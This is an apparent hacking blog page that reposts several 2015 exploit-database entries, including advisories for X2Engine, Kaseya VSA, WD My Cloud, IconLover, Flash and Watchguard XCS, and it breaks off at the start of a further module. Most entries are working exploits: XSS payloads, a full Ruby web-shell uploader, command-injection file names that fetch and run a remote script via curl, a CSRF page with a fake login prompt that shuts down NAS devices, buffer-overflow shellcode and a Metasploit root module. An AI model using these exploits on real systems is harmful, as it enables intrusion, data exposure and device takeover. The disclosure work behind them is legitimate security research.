Source: https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2015-5074/
Details:
It was discovered that authenticated users were able to upload files of any type providing that the file did not have an extension that was listed in the following blacklist:
const EXT_BLACKLIST = '/\.\s*(?P<ext>html|htm|js|jsb|mhtml|mht|xhtml|xht|php|phtml|php3|php4|php5|phps|shtml|jhtml|pl|py|cgi|exe|scr|dll|msi|vbs|bat|com|pif|cmd|vxd|cpl|ini|conf|cnf|key|iv|htaccess)\b/i';
However, there is another common (not present in regexp) that allow PHP execution: .PHT. It is therefore possible to execute any PHP code on the remote system.
Impact:
Permitting the uploading of arbitrary files could result in highly damaging content such as malware, indecent images, viruses and/or pirated software being uploaded and stored, and later downloaded. In addition, the storage of such material could quite possibly have serious legal implications for the hosting organisation.
In this case, an attacker could exploit the functionality to upload server scripts which, when requested by a browser, would execute code on the server.
Exploit:
Exploit code not required.
Remediation:
The vendor has released a patch however it is also possible to add new extensions such as PHT to the existing blacklist.
Vendor status:
15/09/2014 Submitted initial contact via web form on X2Engine’s page
30/09/2014 Second initial contact message sent via web form
08/12/2014 Final chaser sent via their web form
20/01/2015 Automated response from the X2 website received on 08/12/2014. Attempting to contact the email address that it was sent from “john@x2engine.com”. If no response by the end of the week will start forced disclosure process
21/01/2015 Initial vendor response, details over vulnerability sent
26/02/2015 Chaser sent to vendor
17/04/2015 Second chaser sent to vendor
08/06/2015 Chaser sent to vendor. Unsure if his emails are getting through to us as he stated that he has been replying
08/06/2015 Vendor responded stating that they needed vulnerability details even though I had sent them months ago
09/06/2015 Vendor is approximately 75% through fix and will have a patch out within the next few weeks
26/06/2015 MITRE assigned CVE-2015-5074
13/07/2015 Vendor asked for CVEs to add to their page. Should be ready for publish soon when they have given their clients time to patch
22/07/2015 Email from vendor stating that they released the fix for this on 13/07/2015 and asked when we would be disclosing
23/07/2015 Vendor has asked if we wait off until they release their next major update (At some point in the next 2 weeks). Confirmed this is fine and to contact us when they have a release date confirmed for it
24/08/2015 Replied to the vendor
26/08/2015 Vendor confirmed that they are ready for us to publish
18/09/2015 Published
Copyright:
Copyright © Portcullis Computer Security Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863530225
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/58045/info
CKEditor is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
CKEditor 4.0.1 is vulnerable; other versions may also be affected.
<body onload="javascript:document.forms[0].submit()">
<form name="form1" method="post" action="http://www.example.com/admin/ckeditor/samples/sample_posteddata.php" enctype="multipart/form-data">
<input type="hidden" name="<script>alert('AkaStep');</script>" id="fupl" value="SENDF"></li>
</form>
source: https://www.securityfocus.com/bid/58072/info
The Pretty Link plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Versions prior to Pretty Link 1.6.3 are vulnerable.
http://www.example.com/wp-content/plugins/pretty-link/includes/version-2-kvasir/open-flash-chart.swf?get-data=(function(){alert(xss)})()
Kaseya VSA is an IT management platform for small and medium corporates.
From its console you can control thousands of computers and mobile
devices. So that if you own the Kaseya server, you own the organisation.
With this post I'm also releasing two Metasploit modules ([E1], [E2])
and a Ruby file ([E3]) that exploit the vulnerabilities described below.
A special thanks to ZDI for assisting with the disclosure of these
vulnerabilities. The full advisory text is below, but can also be
obtained from my repo at [E4].
[E1] https://github.com/rapid7/metasploit-framework/pull/6018
[E2] https://github.com/rapid7/metasploit-framework/pull/6019
[E3] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/kazPwn.rb
[E4]
https://raw.githubusercontent.com/pedrib/PoC/master/advisories/kaseya-vs
a-vuln-2.txt
Regards,
Pedro
============
>> Multiple vulnerabilities in Kaseya Virtual System Administrator
>> Discovered by Pedro Ribeiro (pedrib (at) gmail (dot) com [email concealed]), Agile Information
Security (http://www.agileinfosec.co.uk/)
========================================================================
==
Disclosure: 23/09/2015 / Last updated: 28/09/2015
>> Background on the affected product:
"Kaseya VSA is an integrated IT Systems Management platform that can be
leveraged seamlessly across IT disciplines to streamline and automate
your IT services. Kaseya VSA integrates key management capabilities into
a single platform. Kaseya VSA makes your IT staff more productive, your
services more reliable, your systems more secure, and your value easier
to show."
A special thanks to ZDI for assisting with the vulnerability reporting
process.
These vulnerabilities were disclosed by ZDI under IDs ZDI-15-448 [1],
ZDI-15-449 [2] and ZDI-15-450 [3] on 23/09/2015.
>> Technical details:
#1
Vulnerability: Remote privilege escalation (add Master Administrator
account - unauthenticated)
CVE-2015-6922 / ZDI-15-448
Affected versions:
VSA Version 7.0.0.0 â?? 7.0.0.32
VSA Version 8.0.0.0 â?? 8.0.0.22
VSA Version 9.0.0.0 â?? 9.0.0.18
VSA Version 9.1.0.0 â?? 9.1.0.8
GET /LocalAuth/setAccount.aspx
Page will attempt to redirect, ignore this and obtain the "sessionVal"
value from the page which will be used in the following POST request.
POST /LocalAuth/setAccount.aspx
sessionVal=<sessionVal>&adminName=<username>&NewPassword=<password>&conf
irm=<password>&adminEmail=bla (at) bla (dot) com [email concealed]&setAccount=Create
You are now a Master Administrator and can execute code in all the
managed desktops and mobile devices.
A Metasploit module that exploits this vulnerability has been released.
#2
Vulnerability: Remote code execution via file upload with directory
traversal (unauthenticated)
CVE-2015-6922 / ZDI-15-449
Affected versions:
VSA Version 7.0.0.0 â?? 7.0.0.32
VSA Version 8.0.0.0 â?? 8.0.0.22
VSA Version 9.0.0.0 â?? 9.0.0.18
VSA Version 9.1.0.0 â?? 9.1.0.8
First we do:
GET /ConfigTab/serverfiles.asp
which will respond with a 302 redirect to /mainLogon.asp?logout=<sessionID>
Thanks for creating a valid sessionID for us, Kaseya!
POST
/ConfigTab/uploader.aspx?PathData=C%3A%5CKaseya%5CWebPages%5C&qqfile=she
ll.asp
Cookie: sessionId=<sessionID>
<... ASP shell here...>
The path needs to be correct, but Kaseya is helpful enough to let us
know when a path doesn't exist.
A Metasploit module that exploits this vulnerability has been released.
#3
Vulnerability: Remote code execution via file upload with directory
traversal (authenticated)
CVE-2015-6589 / ZDI-15-450
Affected versions:
VSA Version 7.0.0.0 â?? 7.0.0.32
VSA Version 8.0.0.0 â?? 8.0.0.22
VSA Version 9.0.0.0 â?? 9.0.0.18
VSA Version 9.1.0.0 â?? 9.1.0.8
Login to the VSA console and obtain ReferringWebWindowId from the URL
(wwid parameter).
Create a POST request as below with the ReferringWebWindowId:
POST /vsapres/web20/json.ashx HTTP/1.1
Content-Type: multipart/form-data;
boundary=---------------------------114052411119142
Content-Length: 1501
-----------------------------114052411119142
Content-Disposition: form-data; name="directory"
../WebPages
-----------------------------114052411119142
Content-Disposition: form-data; name="ReferringWebWindowId"
31a5d16a-01b7-4f8d-adca-0b2e70006dfa
-----------------------------114052411119142
Content-Disposition: form-data; name="request"
uploadFile
-----------------------------114052411119142
Content-Disposition: form-data; name="impinf__uploadfilelocation";
filename="shell.asp"
Content-Type: application/octet-stream
<... ASP shell here...>
-----------------------------114052411119142--
A Ruby exploit (kazPwn.rb) that abuses this vulnerability has also been
been released [4].
>> Fix:
V7 â?? Install patch 7.0.0.33
R8 â?? Install patch 8.0.0.23
R9 â?? Install patch 9.0.0.19
R9.1 â?? Install patch 9.1.0.9
>> References:
[1] http://zerodayinitiative.com/advisories/ZDI-15-448/
[2] http://zerodayinitiative.com/advisories/ZDI-15-449/
[3] http://zerodayinitiative.com/advisories/ZDI-15-450/
[4] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/kazPwn.rb
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIcBAEBAgAGBQJWCm9DAAoJEOToNW8ubuEaXLAQAIXcXSYwxJ5YLD0eyDxSO8z3
Vxmzf1jKqCHgTblKfW2+AaAhV7Z6u0fcjw4axV0TiRCUJgp3RANo2DkEjbrP/Pv2
L4Yk34FM0ijfgg5x6rG7M8496jm91iEYpoYcCpsnqE0ZN1RbQZWmqWjJHpVPcPno
RgjNV/OHGBzaikj5BV1yaJwT/KpvV0IGUDB54ZPto8lEYtqxfYl4+zg39DQ+GlRy
OlU+Bovj/n2AiJ52omdm1JJL3DW6rhto8FH7yRUvBeW3ofgdBHwG4Ynxk3gOAhY3
AvD2uIs5eY5siapb7/kA8RSKKuTUYo/p80hDwhkAzVYwlrkDTl7s9gSPU/KOY04/
ur64fhC/9TTEMONZ5PQdbrL5WSAVRTdcsCDbZ8YCbZxoexPzObhdV1qV99Go8Ny+
pd5WCoziQtrK8r2u6v7dsfJfYnvURG7SdcD15e1oIe4OaZzEsXxbcgLEmbskhdOP
ZmcuzkYqUfpFvaFQ3O8PMtBb8jqpkt76X4Q+0JbVG9nUzwA1nS2xoGw0Ad8NDoUi
Nw5BxwW4Z7zCSHgBI6CYUTZQ0QvZFVZXOkix6+GnslzDwXu6m1cnY+PXa5K5jJtm
/BMO8WVUvwPdUAeRMTweggoXOModWC/56BZNgquxTkayz2r9c7AdEr0aZDLYIxr0
OHLrGsL5XSDW9txZqDl9
=rF0G
-----END PGP SIGNATURE-----
#!/usr/bin/ruby
#
# kazPwn.rb - Kaseya VSA v7 to v9.1 authenticated arbitrary file upload (CVE-2015-6589 / ZDI-15-450)
# ===================
# by Pedro Ribeiro <pedrib@gmail.com> / Agile Information Security
# Disclosure date: 28/09/2015
#
# Usage: ./kazPwn.rb http[s]://<host>[:port] <username> <password> <shell.asp>
#
# execjs and mechanize gems are required to run this exploit
#
# According to Kaseya's advisory, this exploit should work for the following VSA versions:
# VSA Version 7.0.0.0 – 7.0.0.32
# VSA Version 8.0.0.0 – 8.0.0.22
# VSA Version 9.0.0.0 – 9.0.0.18
# VSA Version 9.1.0.0 – 9.1.0.8
# This exploit has been tested with v8 and v9.
#
# Check out these two companion vulnerabilities, both of which have Metasploit modules:
# - Unauthenticated remote code execution (CVE-2015-6922 / ZDI-15-449)
# - Unauthenticated remote privilege escalation (CVE-2015-6922 / ZDI-15-448)
#
# This code is released under the GNU General Public License v3
# http://www.gnu.org/licenses/gpl-3.0.html
#
require 'execjs'
require 'mechanize'
require 'open-uri'
require 'uri'
require 'openssl'
# avoid certificate errors
OpenSSL::SSL::VERIFY_PEER = OpenSSL::SSL::VERIFY_NONE
I_KNOW_THAT_OPENSSL_VERIFY_PEER_EQUALS_VERIFY_NONE_IS_WRONG = nil
# Fixes a Mechanize bug, see
# http://scottwb.com/blog/2013/11/09/defeating-the-infamous-mechanize-too-many-connection-resets-bug/
class Mechanize::HTTP::Agent
MAX_RESET_RETRIES = 10
# We need to replace the core Mechanize HTTP method:
#
# Mechanize::HTTP::Agent#fetch
#
# with a wrapper that handles the infamous "too many connection resets"
# Mechanize bug that is described here:
#
# https://github.com/sparklemotion/mechanize/issues/123
#
# The wrapper shuts down the persistent HTTP connection when it fails with
# this error, and simply tries again. In practice, this only ever needs to
# be retried once, but I am going to let it retry a few times
# (MAX_RESET_RETRIES), just in case.
#
def fetch_with_retry(
uri,
method = :get,
headers = {},
params = [],
referer = current_page,
redirects = 0
)
action = "#{method.to_s.upcase} #{uri.to_s}"
retry_count = 0
begin
fetch_without_retry(uri, method, headers, params, referer, redirects)
rescue Net::HTTP::Persistent::Error => e
# Pass on any other type of error.
raise unless e.message =~ /too many connection resets/
# Pass on the error if we've tried too many times.
if retry_count >= MAX_RESET_RETRIES
puts "**** WARN: Mechanize retried connection reset #{MAX_RESET_RETRIES} times and never succeeded: #{action}"
raise
end
# Otherwise, shutdown the persistent HTTP connection and try again.
# puts "**** WARN: Mechanize retrying connection reset error: #{action}"
retry_count += 1
self.http.shutdown
retry
end
end
# Alias so #fetch actually uses our new #fetch_with_retry to wrap the
# old one aliased as #fetch_without_retry.
alias_method :fetch_without_retry, :fetch
alias_method :fetch, :fetch_with_retry
end
if ARGV.length < 4
puts 'Usage: ./kazPwn.rb http[s]://<host>[:port] <username> <password> <shell.asp>'
exit -1
end
host = ARGV[0]
username = ARGV[1]
password = ARGV[2]
shell_file = ARGV[3]
login_url = host + '/vsapres/web20/core/login.aspx'
agent = Mechanize.new
# 1- go to the login URL, get a session cookie and the challenge.
page = agent.get(login_url)
login_form = page.forms.first
challenge = login_form['loginFormControl$ChallengeValueField']
# 2- calculate the password hashes with the challenge
source = open(host + "/inc/sha256.js").read
source += open(host + "/inc/coverPass.js").read
source += open(host + "/inc/coverPass256.js").read
source += open(host + "/inc/coverData.js").read
source += open(host + "/inc/passwordHashes.js").read
source.gsub!(/\<\!--(\s)*\#include.*--\>/, "") # remove any includes, this causes execjs to fail
context = ExecJS.compile(source)
hashes = context.call("getHashes",username,password,challenge)
# 3- submit the login form, authenticate our cookie and get the ReferringWebWindowId needed to upload the file
# We need the following input values to login:
# - __EVENTTARGET (empty)
# - __EVENTARGUMENT (empty)
# - __VIEWSTATE (copied from the original GET request)
# - __VIEWSTATEENCRYPTED (copied from the original GET request; typically empty)
# - __EVENTVALIDATION (copied from the original GET request)
# - loginFormControl$UsernameTextbox (username)
# - loginFormControl$PasswordTextbox (empty)
# - loginFormControl$SubmitButton (copied from the original GET request; typically "Logon")
# - loginFormControl$SHA1Field (output from getHashes)
# - loginFormControl$RawSHA1Field (output from getHashes)
# - loginFormControl$SHA256Field (output from getHashes)
# - loginFormControl$RawSHA256Field (output from getHashes)
# - loginFormControl$ChallengeValueField (copied from the original GET request)
# - loginFormControl$TimezoneOffset ("0")
# - loginFormControl$ScreenHeight (any value between 800 - 2048)
# - loginFormControl$ScreenWidth (any value between 800 - 2048)
login_form['__EVENTTARGET'] = ''
login_form['__EVENTARGUMENT'] = ''
login_form['loginFormControl$UsernameTextbox'] = username
login_form['loginFormControl$SHA1Field'] = hashes['SHA1Hash']
login_form['loginFormControl$RawSHA1Field'] = hashes['RawSHA1Hash']
login_form['loginFormControl$SHA256Field'] = hashes['SHA256Hash']
login_form['loginFormControl$RawSHA256Field'] = hashes['RawSHA256Hash']
login_form['loginFormControl$TimezoneOffset'] = 0
login_form['loginFormControl$SubmitButton'] = 'Logon'
login_form['loginFormControl$screenHeight'] = rand(800..2048)
login_form['loginFormControl$screenWidth'] = rand(800..2048)
page = agent.submit(login_form)
web_windowId = Hash[URI::decode_www_form(page.uri.query)]['ReferringWebWindowId']
# 4- upload the file using the ReferringWebWindowId
page = agent.post('/vsapres/web20/json.ashx',
'directory' => "../WebPages",
'ReferringWebWindowId' => web_windowId,
'request' => 'uploadFile',
'impinf__uploadfilelocation' => File.open(shell_file)
)
if page.code == "200"
puts "Shell uploaded, check " + host + "/" + File.basename(shell_file)
else
puts "Error occurred, shell was not uploaded correctly..."
end
# Exploit Title: Western Digital My Cloud Command Injection
# Vendor Homepage: http://www.wdc.com
# Firmware tested: 04.01.03-421 and 04.01.04-422 for the Personal Cloud devices
# Firmware link: http://download.wdc.com/nas/sq-040104-422-20150423.deb.zip
# Exploit Author: James Sibley (absane) ; twitter = @ab5ane
# Blog post: http://versprite.com/og/command-injection-in-the-wd-my-cloud-nas/
# Discovery date: May 10 2015
# Vendor notified: May 12 2015
# Vendor fixed: September 2015 with rolling updates
# Vendor advisory: http://community.wd.com/t5/My-Cloud/Potential-Security-Vulnerabilities-with-My-Cloud-Personal-Cloud/td-p/898578
=======================
| Overview |
=======================
The function "exec_runtime", defined in /var/www/restapi/api/Core/init_autoloader.php, executes programs and scripts on the Linux-based WD My Cloud NAS through the PHP "exec" function. In many instances, user input makes its way into the "exec" function without proper validation and sanitization. Because of this, attackers can hijack the command flow and execute arbitrary commands in the context of the user www-data. The www-data user has unrestricted sudo access so escalating to root and therefore compromising the device is trivial.
This was discovered in the "My Cloud Personal Cloud" device but other models may be affected.
=======================
| Proof of Concepts |
=======================
There are two ways to show this:
Method 1) Using the client application ("WD My Cloud Desktop") upload 2GB file with the following name: $(sudo shutdown -h now).txt
Method 2) a) Authenticate as the administrator @ http://wdmycloud:80
b) Open the following path: /api/1.0/rest/safepoint_getstatus?handle=$(sudo shutdown -h now)&action=update
In both PoCs, observe that the device powers off.
=======================
| Exploit 1 |
=======================
This exploit will make all private folders public. A video demo is in the blog.
1) On a webserver host the following as index.html:
#!/bin/bash
while read share;
do
echo UPDATE UserShares SET public_access=\"true\" WHERE share_name=\"$share\"";" | sqlite3 /usr/local/nas/orion/orion.db;
done < <(bash /usr/local/sbin/getShares.sh private)
2) Upload a 2GB file to the WD My Cloud NAS with the client application ("WD My Cloud Desktop"). Use the following name:
$(sudo curl 192.168.0.226 -o makeAllPublic.sh && sudo bash makeAllPublic.sh).txt
3) After the file uploads, refresh the file list.
=======================
| Exploit 2 |
=======================
<!-- The following PHP script will utilize CSRF and WebRTC to remotely shutdown the My Cloud device. -->
<!-- Assumes zero knowledge of device's internal IP and current authentication state. -->
<!-- Requires that the targeted user has admin rights and is on the same LAN as the My Cloud. -->
<!-- Source for the WebRTC JS code: https://dl.dropboxusercontent.com/u/1878671/enumhosts.html -->
<?php
if (empty( $_GET['exploit'] ) ) {
echo "<html>";
echo " <form id=\"login_form\" action=\"pwnmycloud.php\" method=\"get\">";
echo " <p>Your WD My Cloud is damaged. Please login to fix this!</p>";
echo " <div class=\"content_row\">";
echo " <label>Username</label>";
echo " <input class=\"NOTEMPTY\" id=\"login_username\" name=\"username\" value=\"\" type=\"text\">";
echo " </div>";
echo " <div class=\"content_row\">";
echo " <label>Password</label>";
echo " <input id=\"login_password\" name=\"password\" value=\"\" autocomplete=\"off\" type=\"password\">";
echo " </div>";
echo " <input id=\"exploit\" name=\"exploit\" value=\"true\" autocomplete=\"off\" type=\"hidden\">";
echo " <input type=\"submit\" value=\"Submit\">";
echo " </form>";
echo "</html>";
die();
} ?>
<!doctype html><html><body onload = "go()"><script>
<!-- Start compressed WebRTC code from https://dl.dropboxusercontent.com/u/1878671/enumhosts.html -->
function TaskController(e,n){this.numConcurrent=e,this.onDone=n||function(){},this.pending=0,this.queued=[],this.checkTimer=-1}function probeIp(e,n,t){var i=Date.now(),o=!1,c=document.createElement("img"),r=function(){c&&(document.body.removeChild(c),c=null)},u=function(){o||(o=!0,r(),t(e,Date.now()-i<n))};document.body.appendChild(c),c.style.display="none",c.onload=function(){u(!0)},c.onerror=function(){u(!1)},c.src="https://"+e+":"+~~(1024+1024*Math.random())+"/I_DO_NOT_EXIST?"+Math.random(),setTimeout(function(){c&&(c.src="")},n+500)}function probeNet(e,n,t){e=e.replace(/(\d+\.\d+\.\d+)\.\d+/,"$1.");for(var i=5e3,o=new TaskController(5,t),c=1;256>c;++c)o.queue(function(t,o){probeIp(e+t,i,function(e,t){t&&n(e),o()})}.bind(this,c))}function enumLocalIPs(e){function n(n){n in o||(o[n]=!0,e(n))}function t(e){e.split("\r\n").forEach(function(e){if(~e.indexOf("a=candidate")){var t=e.split(" "),i=t[4],o=t[7];"host"===o&&n(i)}else if(~e.indexOf("c=")){var t=e.split(" "),i=t[2];n(i)}})}var i=window.webkitRTCPeerConnection||window.mozRTCPeerConnection;if(!i)return!1;var o=Object.create(null);o["0.0.0.0"]=!1;var c=new i({iceServers:[]});return c.createDataChannel("",{reliable:!1}),c.onicecandidate=function(e){e.candidate&&t("a="+e.candidate.candidate)},setTimeout(function(){c.createOffer(function(e){t(e.sdp),c.setLocalDescription(e)},function(){})},500),!0}function getIPs(e){new TaskController(1);enumLocalIPs(function(n){e(n)})}TaskController.prototype.deferCheck=function(){-1==this.checkTimer&&(this.checkTimer=setTimeout(function(){this.checkTimer=-1,this.check()}.bind(this),0))},TaskController.prototype.check=function(){if(this.pending<1&&0==this.queued.length)return this.onDone();for(;this.pending<this.numConcurrent&&this.queued.length>0;)try{this.pending+=1,setTimeout(function(e){e(function(){this.pending-=1,this.deferCheck()}.bind(this))}.bind(this,this.queued.shift()),0)}catch(e){this.pending-=1,this.deferCheck()}},TaskController.prototype.queue=function(e){this.queued.push(e),this.deferCheck()},document.write=function(e){var n=document.getElementsByTagName("script"),t=n[n.length-1];t.insertAdjacentHTML("beforebegin",e)};
<!-- End compressed WebRTC code from https://dl.dropboxusercontent.com/u/1878671/enumhosts.html -->
function exploit(ip) {
var ip_part = ip.split(".");
var cidr_24 = ip_part[0] + "." + ip_part[1] + "." + ip_part[2] + ".";
if (ip_part[0] == "192" || ip_part[0] == "172" || ip_part[0] == "10") {
var expFrame = new Array(255);
for (i = 2; i < 40; i++) {
document.write("<iframe id=\"" + i + "\" src=\"http://" + cidr_24 + i +"/api/2.1/rest/local_login?username=" + "<?php echo $_GET['username'] ?>" + "&password=" + "<?php echo $_GET['password'] ?>\" height=0 width=0 style=\"visibility:hidden;display:none\"></iframe>");
};
for (i = 2; i < 40; i++) {
document.write("<iframe id=\"exp" + i + "\" src=\"http://" + cidr_24 + i + "/api/1.0/rest/safepoint_getstatus?handle=$(sudo shutdown -h now)&action=update\" height=0 width=0 style=\"visibility:hidden;display:none\"></iframe>");
setInterval( function(id) {document.getElementById(id).src = document.getElementById(id).src;}, 2000, "exp"+i );
};
};
};
function go() {
getIPs(function(ip) {
exploit(ip);
});
}; </script></body></html>
=======================
| Mitigation |
=======================
An update to the firmware has been released as of 9/28/15.
Additional steps include:
* Don't click on links from websites or people you don't know or trust ;)
* Disable WebRTC in your browsers.
* Restrict access to the My Cloud device to only trusted users that need access to it.
* Disable remote access to the device if it is not used.
* Avoid using the client application until a firmware update has been applied.
# Exploit Title: IconLover v5.42 Buffer Overflow Exploit
# Date: 29/09/2015
# Exploit Author: cor3sm4sh3r
# Author email: cor3sm4sh3r[at]gmail.com
# Contact: https://in.linkedin.com/in/cor3sm4sh3r
# Twitter: https://twitter.com/cor3sm4sh3r
# Category: Local
# Tested : win XP professional sp2
'''
Credits & Authors:
==================
ZwX (http://zwx.fr/)
[http://www.vulnerability-lab.com/show.php?user=ZwX]
#References (Source):
http://www.vulnerability-lab.com/get_content.php?id=1609
Affected Product(s):
====================
AHA-Soft
Product: IconLover - Software (Windows) 5.42 and 5.45
Manual steps to exploit...
1. Copy the content of exploit.txt to your clipboard
2. Run the IconLover.exe software
3. Click the File -> New Icon Lybrary option
4. Click the Lybrary and push the Download button
5. Paste it the input Website Adress (URL) AAAA+... string click ok and hide
6. Successful exploitation will open an instance of calc.exe!
'''
#!/usr/bin/env python
#badchars = "\x00\x0a\x0d"
junk = "\x41" * 1039
eip = "\xed\x1e\x94\x7c" #jmp esp 7c941eed ntdll.dll ( XP sp2 )
nopsled ="\x90"*20
shellcode = "\x33\xc0" #=> XOR EAX,EAX | Zero out EAX register
shellcode += "\x50" #=> PUSH EAX | Push EAX to have null-byte padding for "calc.exe"
shellcode += "\x68\x2E\x65\x78\x65" #=> PUSH ".exe" | Push The ASCII string to the stack
shellcode += "\x68\x63\x61\x6C\x63" #=> PUSH "calc" |
shellcode += "\x8B\xC4" #=> MOV EAX,ESP | Put a pointer to the ASCII string in EAX
shellcode += "\x6A\x01" #=> PUSH 1 | Push uCmdShow parameter to the stack
shellcode += "\x50" #=> PUSH EAX | Push the pointer to lpCmdLine to the stack
shellcode += "\xBB\x4d\x11\x86\x7C" #=> MOV EBX,7C86114d | Move the pointer to WinExec() into EBX
shellcode += "\xFF\xD3" #=> CALL EBX
shellcode += "\x33\xc0" #=> XOR EAX,EAX | Zero out EAX register
shellcode += "\x50" #=> PUSH EAX | Push EAX
shellcode += "\xBB\xa2\xca\x81\x7c" #=> MOV EBX,7C81caa2 | Exit process
shellcode += "\xFF\xD3" #=> CALL EBX
packet = junk + eip + nopsled + shellcode + nopsled
file=open('exploit.txt','w')
file.write(packet)
file.close()
Source: https://code.google.com/p/google-security-research/issues/detail?id=504
The latest version of the Vector.<primitive> length check in Flash 18,0,0,232 is not robust against memory corruptions such as heap overflows. While it’s no longer possible to obviously bypass the length check there’s still unguarded data in the object which could be corrupted to serve as a useful primitive.
To better describe this currently the Vector primitive object (at least on 32 bit) looks something like:
| unguarded length | unguarded capacity | xored length | ... | data |
The problem arises because the capacity is not guarded by the xor, and it’s before the xored length which is guarded. As we know the unguarded length value then if we have a suitable memory corruption vulnerability we could corrupt only the length and the capacity fields leaving the xored length alone. Of course we’d need to corrupt the length back to the same value (otherwise the length guard check would fail). If we set the capacity to be greater than that originally allocated then when a call is made to set the length (using the length Vector property) the runtime will assume the allocation is larger than it is and extend the vector over the end of the original allocation.
This in itself is not enough to serve as a useful primitive as extending the vector also 0’s any data afterwards so it’s not an information leak. However we’ve now got a vector which aliases some other part of the heap. If for example something else was allocated immediately after the vector which we can influence then it’d be possible to write data to that and read it out from the vector, and vice versa. Also depending on the heap type it might be possible to reconstruct heap headers, but it probably isn’t on Windows. As vector objects are now on the system heap it’s a lot harder to exploit. It’s likely that an attacker would need to utilize browser specific heap allocations rather than another flash allocation.
One way of fixing this, at least against buffer overflows, would be to move the xored length before the capacity. In this case the act of overflowing the capacity value would corrupt the guard length leading to the check failure when setting the new length to exceed the existing capacity. This wouldn’t do anything against a heap relative overwrite or a buffer underflow. In that case you could also apply the guard to the capacity field as well. If Vectors are completely moved out from the heap with other objects, as planned, exploiting this would probably be very difficult.
On a related note, it’s still possible to read the length of the vector without triggering the guard check. The length is whatever the unguarded length is set to. This could be used as a way of checking which vector objects have been corrupted by an overflow.
I’ve provided a simple example which allocates a 16k UInt vector. Using a debugger you can modify the capacity then press a key to show that the process doesn’t crash (at least doesn’t crash due to a length corruption). The following instructions are for IE11 with 32 bit tabs (the default even on x64 builds).
1. Load the swf file into IE
2. Attach WinDBG to the IE tab process
3. Search for the data pattern to find the vector using the command “s 0 L?10000000 78 56 34 12 f0 de bc 9a 00 00 00 00”. There should only be one hit.
4. Modify the capacity using the command “ed <address>-0xC 5000” replacing <address> with that found in step 3. Also look at <address>+0n64*0n1024 which will should show other data on the heap.
5. Resume execution in the debugger.
6. Select the flash object in the browser and press the ‘=’ key, you should see a trace message printing the new length.
7. If you return to the debugger and dump the data at <addresss>+0n64*0n1024 you’ll find the memory has been zeroed. Also at <addresss>+0n64*0n1024+3C you should find that the value 0x88888888 has been written to existing allocated memory.
The source is a HAXE file, you need to compile with the command line “haxe -main Test -swf output.swf -swf-version 10”
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38348.zip
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Local
# It needs 3 minutes wait time
# WfsDelay set to 180, so it should be a Manual exploit,
# to avoid it being included in automations
Rank = ManualRanking
include Msf::Exploit::EXE
include Msf::Post::File
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Watchguard XCS FixCorruptMail Local Privilege Escalation',
'Description' => %q{
This module exploits a vulnerability in the Watchguard XCS 'FixCorruptMail' script called
by root's crontab which can be exploited to run a command as root within 3 minutes.
},
'Author' =>
[
'Daniel Jensen <daniel.jensen[at]security-assessment.com>' # discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf']
],
'Platform' => 'bsd',
'Arch' => ARCH_X86_64,
'SessionTypes' => ['shell'],
'Privileged' => true,
'Targets' =>
[
[ 'Watchguard XCS 9.2/10.0', { }]
],
'DefaultOptions' => { 'WfsDelay' => 180 },
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 29 2015'
))
end
def setup
@pl = generate_payload_exe
if @pl.nil?
fail_with(Failure::BadConfig, 'Please select a native bsd payload')
end
super
end
def check
#Basic check to see if the device is a Watchguard XCS
res = cmd_exec('uname -a')
return Exploit::CheckCode::Detected if res && res.include?('support-xcs@watchguard.com')
Exploit::CheckCode::Safe
end
def upload_payload
fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
write_file(fname, @pl)
return nil unless file_exist?(fname)
cmd_exec("chmod +x #{fname}")
fname
end
def exploit
print_warning('Rooting can take up to 3 minutes.')
#Generate and upload the payload
filename = upload_payload
fail_with(Failure::NotFound, 'Payload failed to upload') if filename.nil?
print_status("Payload #{filename} uploaded.")
#Sets up empty dummy file needed for privesc
dummy_filename = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
cmd_exec("touch #{dummy_filename}")
vprint_status('Added dummy file')
#Put the shell injection line into badqids
#setup_privesc = "echo \"../../../../../..#{dummy_filename};#{filename}\" > /var/tmp/badqids"
badqids = write_file('/var/tmp/badqids', "../../../../../..#{dummy_filename};#{filename}")
fail_with(Failure::NotFound, 'Failed to create badqids file to exploit crontab') if badqids.nil?
print_status('Badqids created, waiting for vulnerable script to be called by crontab...')
#cmd_exec(setup_privesc)
#Cleanup the files we used
register_file_for_cleanup('/var/tmp/badqids')
register_file_for_cleanup(dummy_filename)
register_file_for_cleanup(filename)
end
end
##
# This module requires Metasploit: http://metasploit.com/download
